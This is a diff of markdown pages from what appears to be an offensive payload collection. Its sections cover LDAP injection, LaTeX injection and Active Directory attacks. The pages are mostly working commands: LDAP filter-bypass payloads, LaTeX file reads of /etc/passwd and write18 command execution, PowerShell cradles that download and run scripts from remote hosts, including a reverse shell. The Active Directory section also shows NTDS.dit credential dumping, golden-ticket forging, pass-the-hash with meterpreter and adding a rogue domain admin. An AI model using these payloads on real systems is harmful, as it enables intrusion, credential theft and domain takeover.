@ -42,6 +44,7 @@ URLDNS |@gebl| | jre only vuln detect
|
||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
|
||||
Additional tools (integration ysoserial with Burp Suite):
|
||||
|
||||
- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)
|
||||
- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
|
||||
- [Burp-ysoserial](https://github.com/summitt/burp-ysoserial)
|
||||
@ -52,6 +55,7 @@ JRE8u20_RCE_Gadget
|
||||
[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
|
||||
|
||||
## Thanks to
|
||||
* [ysoserial](https://github.com/frohoff/ysoserial)
|
||||
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
|
||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
|
@ -1,24 +1,28 @@
|
||||
# LDAP injection
|
||||
|
||||
LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
|
||||
|
||||
## Exploitation
|
||||
|
||||
Example 1.
|
||||
```
|
||||
|
||||
```sql
|
||||
user = *)(uid=*))(|(uid=*
|
||||
pass = password
|
||||
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
|
||||
```
|
||||
|
||||
Example 2
|
||||
```
|
||||
|
||||
```sql
|
||||
user = admin)(!(&(1=0
|
||||
pass = q))
|
||||
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
|
||||
```
|
||||
|
||||
|
||||
## Payloads
|
||||
```
|
||||
|
||||
```text
|
||||
*
|
||||
*)(&
|
||||
*))%00
|
||||
@ -41,8 +45,10 @@ x' or name()='username' or 'x'='y
|
||||
```
|
||||
|
||||
## Blind Exploitation
|
||||
|
||||
We can extract using a bypass login
|
||||
```
|
||||
|
||||
```sql
|
||||
(&(sn=administrator)(password=*)) : OK
|
||||
(&(sn=administrator)(password=A*)) : KO
|
||||
(&(sn=administrator)(password=B*)) : KO
|
||||
@ -61,5 +67,6 @@ We can extract using a bypass login
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
||||
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
||||
|
@ -1,12 +1,14 @@
|
||||
# LaTex Injection
|
||||
|
||||
## Read file
|
||||
|
||||
```bash
|
||||
\input{/etc/passwd}
|
||||
\include{password} # load .tex file
|
||||
```
|
||||
|
||||
Read single lined file
|
||||
|
||||
```bash
|
||||
\newread\file
|
||||
\openin\file=/etc/issue
|
||||
@ -16,24 +18,26 @@ Read single lined file
|
||||
```
|
||||
|
||||
Read multiple lined file
|
||||
|
||||
```bash
|
||||
\newread\file
|
||||
\openin\file=/etc/passwd
|
||||
\loop\unless\ifeof\file
|
||||
\read\file to\fileline
|
||||
\read\file to\fileline
|
||||
\text{\fileline}
|
||||
\repeat
|
||||
\closein\file
|
||||
```
|
||||
|
||||
Read text file, keep the formatting
|
||||
|
||||
```bash
|
||||
\usepackage{verbatim}
|
||||
\verbatiminput{/etc/passwd}
|
||||
```
|
||||
|
||||
|
||||
## Write file
|
||||
|
||||
```bash
|
||||
\newwrite\outfile
|
||||
\openout\outfile=cmd.tex
|
||||
@ -42,12 +46,16 @@ Read text file, keep the formatting
|
||||
```
|
||||
|
||||
## Command execution
|
||||
|
||||
The input of the command will be redirected to stdin, use a temp file to get it.
|
||||
|
||||
```bash
|
||||
\immediate\write18{env > output}
|
||||
\input{output}
|
||||
```
|
||||
|
||||
If you get any LaTex error, consider using base64 to get the result without bad characters
|
||||
|
||||
```bash
|
||||
\immediate\write18{env | base64 > test.tex}
|
||||
\input{text.tex}
|
||||
@ -58,8 +66,8 @@ If you get any LaTex error, consider using base64 to get the result without bad
|
||||
\input{|"/bin/hostname"}
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
|
||||
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
|
||||
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
|
@ -1,12 +1,13 @@
|
||||
# Active Directory Attacks
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||
* [Open Shares](#open-shares)
|
||||
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||
* [Password in AD User comment](#password-in-ad-user-comment)
|
||||
* [Golden Tickets](#passtheticket-golden-tickets)
|
||||
* [Silver Tickets](#passtheticket-silver-tickets)
|
||||
@ -22,44 +23,51 @@
|
||||
* [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
|
||||
* [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
|
||||
* [Responder](https://github.com/SpiderLabs/Responder)
|
||||
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
|
||||
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
||||
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||
```powershell
|
||||
apt install bloodhound #kali
|
||||
neo4j console
|
||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||
./bloodhound
|
||||
SharpHound.exe (from resources/Ingestor)
|
||||
or
|
||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||
```
|
||||
|
||||
```powershell
|
||||
apt install bloodhound #kali
|
||||
neo4j console
|
||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||
./bloodhound
|
||||
SharpHound.exe (from resources/Ingestor)
|
||||
or
|
||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||
```
|
||||
|
||||
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
|
||||
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
|
||||
```bash
|
||||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||
crackmapexec smb -L
|
||||
crackmapexec smb -M name_module -o VAR=DATA
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||
```
|
||||
|
||||
```bash
|
||||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||
crackmapexec smb -L
|
||||
crackmapexec smb -M name_module -o VAR=DATA
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||
```
|
||||
|
||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||
```powershell
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||||
```
|
||||
|
||||
```powershell
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||||
```
|
||||
|
||||
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
|
||||
|
||||
## Most common paths to AD compromise
|
||||
|
||||
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
|
||||
|
||||
```bash
|
||||
Exploit Python: https://www.exploit-db.com/exploits/35474/
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
@ -72,6 +80,7 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||
```
|
||||
|
||||
## Open Shares
|
||||
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
ls # list files
|
||||
@ -81,20 +90,23 @@ put # replace a file
|
||||
```
|
||||
|
||||
Mount a share
|
||||
|
||||
```powershell
|
||||
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
|
||||
```
|
||||
|
||||
|
||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
||||
Find password in SYSVOL
|
||||
|
||||
```powershell
|
||||
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||
```
|
||||
|
||||
Decrypt a password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
|
||||
|
||||
```bash
|
||||
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
||||
|
||||
@ -102,6 +114,7 @@ e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl e
|
||||
```
|
||||
|
||||
Metasploit modules to enumerate shares and credentials
|
||||
|
||||
```c
|
||||
scanner/smb/smb_enumshares
|
||||
windows/gather/enumshares
|
||||
@ -109,12 +122,14 @@ windows/gather/credentials/gpp
|
||||
```
|
||||
|
||||
Crackmapexec modules
|
||||
|
||||
```powershell
|
||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
|
||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
|
||||
```
|
||||
|
||||
List all GPO for a domain
|
||||
List all GPO for a domain
|
||||
|
||||
```powershell
|
||||
Get-GPO -domaine DOMAIN.COM -all
|
||||
Get-GPOReport -all -reporttype xml --all
|
||||
@ -124,9 +139,10 @@ Get-NetGPO
|
||||
Get-NetGPOGroup
|
||||
```
|
||||
|
||||
|
||||
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
|
||||
**Using ndtsutil**
|
||||
|
||||
#### Using ndtsutil
|
||||
|
||||
```powershell
|
||||
C:\>ntdsutil
|
||||
ntdsutil: activate instance ntds
|
||||
@ -136,28 +152,31 @@ ifm: quit
|
||||
ntdsutil: quit
|
||||
```
|
||||
|
||||
**Using Vshadow**
|
||||
#### Using Vshadow
|
||||
|
||||
```powershell
|
||||
vssadmin create shadow /for=C :
|
||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||
```
|
||||
|
||||
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
|
||||
```powershell
|
||||
Import-Module .\Copy-VSS.ps1
|
||||
Copy-VSS
|
||||
Copy-VSS -DestinationDir C:\ShadowCopy\
|
||||
```
|
||||
|
||||
**Using vssadmin**
|
||||
#### Using vssadmin
|
||||
|
||||
```powershell
|
||||
vssadmin create shadow /for=C:
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
||||
```
|
||||
|
||||
#### Using DiskShadow (a Windows signed binary)
|
||||
|
||||
**Using DiskShadow (a Windows signed binary)**
|
||||
```powershell
|
||||
diskshadow.txt contains :
|
||||
set context persistent nowriters
|
||||
@ -175,46 +194,55 @@ dir c:\exfil
|
||||
reg.exe save hklm\system c:\exfil\system.bak
|
||||
```
|
||||
|
||||
**Extract hashes from ntds.dit**
|
||||
#### Extract hashes from ntds.dit
|
||||
|
||||
then you need to use secretsdump to extract the hashes
|
||||
```c
|
||||
|
||||
```java
|
||||
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||
```
|
||||
|
||||
secretsdump also works remotely
|
||||
```c
|
||||
|
||||
```java
|
||||
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
|
||||
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
|
||||
```
|
||||
|
||||
#### Alternatives - modules
|
||||
|
||||
**Alternatives - modules**
|
||||
Metasploit modules
|
||||
|
||||
```c
|
||||
windows/gather/credentials/domain_hashdump
|
||||
```
|
||||
|
||||
PowerSploit module
|
||||
```
|
||||
|
||||
```powershell
|
||||
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
||||
```
|
||||
|
||||
CrackMapExec module
|
||||
```bash
|
||||
|
||||
```powershell
|
||||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||
```
|
||||
|
||||
### Password in AD User comment
|
||||
|
||||
```powershell
|
||||
enum4linux | grep -i desc
|
||||
There are 3-4 fields that seem to be common in most AD schemas:
|
||||
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
||||
```
|
||||
|
||||
|
||||
### PassTheTicket Golden Tickets
|
||||
Forge a TGT, require krbtgt key
|
||||
|
||||
Forging a TGT require the krbtgt key
|
||||
|
||||
Mimikatz version
|
||||
|
||||
```powershell
|
||||
Get info - Mimikatz
|
||||
lsadump::dcsync /user:krbtgt
|
||||
@ -227,7 +255,8 @@ kerberos::tgt
|
||||
```
|
||||
|
||||
Meterpreter version
|
||||
```c
|
||||
|
||||
```powershell
|
||||
Get info - Meterpreter(kiwi)
|
||||
dcsync_ntlm krbtgt
|
||||
dcsync krbtgt
|
||||
@ -242,6 +271,7 @@ kerberos_ticket_list
|
||||
```
|
||||
|
||||
Using a ticket on Linux
|
||||
|
||||
```powershell
|
||||
Convert the ticket kirbi to ccache with kekeo
|
||||
misc::convert ccache ticket.kirbi
|
||||
@ -262,7 +292,9 @@ NOTE: You may need to comment the proxy_dns setting in the proxychains configura
|
||||
```
|
||||
|
||||
### PassTheTicket Silver Tickets
|
||||
|
||||
Forging a TGS require machine accound password (key) from the KDC
|
||||
|
||||
```powershell
|
||||
Create a ticket for the service
|
||||
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
|
||||
@ -274,10 +306,12 @@ export KRB5CCNAME=/home/user/ticket.ccache
|
||||
```
|
||||
|
||||
### Trust Tickets
|
||||
|
||||
TODO
|
||||
|
||||
### Kerberoast
|
||||
```c
|
||||
|
||||
```powershell
|
||||
https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
|
||||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||||
https://room362.com/post/2016/kerberoast-pt1/
|
||||
@ -286,15 +320,17 @@ https://room362.com/post/2016/kerberoast-pt1/
|
||||
(Impacket) Kerberoasting (ldap query, tgs in JTR format)
|
||||
```
|
||||
|
||||
### Pass-the-Hash
|
||||
### Pass-the-Hash
|
||||
|
||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
|
||||
```c
|
||||
|
||||
```powershell
|
||||
use exploit/windows/smb/psexec
|
||||
set RHOST 10.2.0.3
|
||||
set SMBUser jarrieta
|
||||
set SMBPass nastyCutt3r
|
||||
// NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||
// NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||
set PAYLOAD windows/meterpreter/bind_tcp
|
||||
run
|
||||
shell
|
||||
@ -311,13 +347,15 @@ sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm has
|
||||
```
|
||||
|
||||
### OverPass-the-Hash (pass the key)
|
||||
|
||||
Request a TGT with only the NT hash
|
||||
```
|
||||
|
||||
```powershell
|
||||
Using impacket
|
||||
./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
|
||||
chmod 600 tgwynn.ccache
|
||||
|
||||
also with the AES Key if you have it
|
||||
also with the AES Key if you have it
|
||||
./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
||||
|
||||
|
||||
@ -327,19 +365,24 @@ klist
|
||||
```
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
AdminSDHolder
|
||||
|
||||
```powershell
|
||||
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
|
||||
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
|
||||
or
|
||||
or
|
||||
([adsisearcher]"(AdminCount=1)").findall()
|
||||
```
|
||||
|
||||
### Trust relationship between domains
|
||||
|
||||
```powershell
|
||||
nltest /trusted_domains
|
||||
```
|
||||
or
|
||||
|
||||
or
|
||||
|
||||
```powershell
|
||||
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
|
||||
|
||||
@ -348,11 +391,13 @@ SourceName TargetName TrustType TrustDirection
|
||||
domainA.local domainB.local TreeRoot Bidirectional
|
||||
```
|
||||
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
### PrivEsc Local Admin - Token Impersonation (RottenPotato)
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
|
||||
```c
|
||||
getuid
|
||||
getprivs
|
||||
@ -369,10 +414,11 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||||
```
|
||||
|
||||
|
||||
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
|
||||
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||
```
|
||||
|
||||
```powershell
|
||||
Powershell:
|
||||
https://www.exploit-db.com/exploits/39719/
|
||||
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
|
||||
@ -382,43 +428,44 @@ Binary exe : https://github.com/Meatballs1/ms16-032
|
||||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||||
```
|
||||
|
||||
|
||||
### PrivEsc Local Admin - MS17-010 (Eternal Blue)
|
||||
|
||||
```c
|
||||
nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
|
||||
```
|
||||
|
||||
### From Local Admin to Domain Admin
|
||||
|
||||
```powershell
|
||||
net user hacker2 hacker123 /add /Domain
|
||||
net group "Domain Admins" hacker2 /add /domain
|
||||
```
|
||||
|
||||
|
||||
## Documentation / Thanks to
|
||||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
|
||||
* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
|
||||
* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
|
||||
* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
|
||||
* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
|
||||
* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
|
||||
* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
|
||||
* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
|
||||
* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
|
||||
* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
|
||||
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
|
||||
* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
|
||||
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
|
||||
* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
|
||||
|
||||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
|
||||
* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
|
||||
* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
|
||||
* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
|
||||
* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
|
||||
* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
|
||||
* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
|
||||
* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
|
||||
* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
|
||||
* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
|
||||
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
|
||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
|
||||
* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
|
||||
